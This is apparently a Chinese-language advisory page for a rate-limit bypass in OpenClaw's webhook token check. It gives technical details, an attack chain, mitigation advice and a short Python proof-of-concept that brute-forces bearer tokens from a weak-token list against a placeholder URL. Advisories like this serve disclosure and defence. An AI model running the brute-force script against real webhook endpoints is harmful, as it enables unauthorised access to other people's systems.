CVE-2026-35646 CVSS 4.8 中危

CVE-2026-35646 OpenClaw Webhook令牌验证速率限制绕过漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35646

漏洞类型

速率限制绕过

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.25之前的版本中存在一处严重的预认证速率限制绕过漏洞。该漏洞位于webhook令牌验证机制中，由于系统未对无效的认证尝试实施任何限流措施，远程攻击者无需用户交互即可利用此缺陷。攻击者可以通过发送大量快速连续的请求来暴力破解弱强度的webhook密钥，进而可能导致系统机密性泄露或完整性受损。

技术细节

该漏洞的核心成因在于OpenClaw的webhook端点缺乏有效的反暴力破解机制。在正常的身份验证流程中，系统应当对连续的失败尝试进行频率限制或延迟响应，然而受影响版本在验证令牌时直接返回错误状态，未记录失败次数或触发阻断。由于攻击向量为网络（AV:N）且无需认证（PR:N），攻击者可以编写自动化脚本，针对目标webhook接口发起高频率的猜测攻击。脚本通过遍历常见的弱密钥字典或随机字符串，并监控HTTP响应的差异（例如状态码变化或响应体内容），来验证令牌的正确性。这种无差别的探测行为虽然受限于网络攻击复杂度（AC:H），但在缺乏速率限制的情况下，长时间的持续攻击足以破解弱密钥，从而接管webhook权限，造成信息篡改或数据泄露。

攻击链分析

STEP 1

侦察

攻击者识别目标OpenClaw实例及其webhook端点URL。

STEP 2

漏洞探测

攻击者发送少量带有错误令牌的测试请求，确认服务器未返回速率限制错误（如429 Too Many Requests）。

STEP 3

暴力破解攻击

攻击者利用脚本自动化发送大量带有不同猜测令牌的请求，尝试绕过验证机制。

STEP 4

未授权访问

一旦猜中正确的webhook令牌，攻击者即可利用该令牌向系统发送伪造指令，获取敏感信息或破坏数据完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target-openclaw-instance/api/webhook"
# Common weak passwords/tokens list
weak_tokens = ["admin", "secret", "password", "123456", "webhook", "key"]

print(f"[+] Starting brute force against {target_url}")

for token in weak_tokens:
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    try:
        # Send payload to trigger webhook validation
        response = requests.post(target_url, headers=headers, json={"data": "test"}, timeout=5)
        
        # Check if the request was successful (indicating a valid token)
        if response.status_code == 200:
            print(f"[!] SUCCESS: Valid token found -> {token}")
            break
        else:
            print(f"[-] Failed: {token} (Status: {response.status_code})")
    except requests.exceptions.RequestException as e:
        print(f"[!] Connection error: {e}")

影响范围

OpenClaw < 2026.3.25

防御指南

临时缓解措施

如果无法立即升级，建议在反向代理（如Nginx）层面针对webhook接口实施IP级别的访问频率限制（例如每分钟不超过5次请求），并立即轮换所有猜测难度较低的Webhook密钥。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表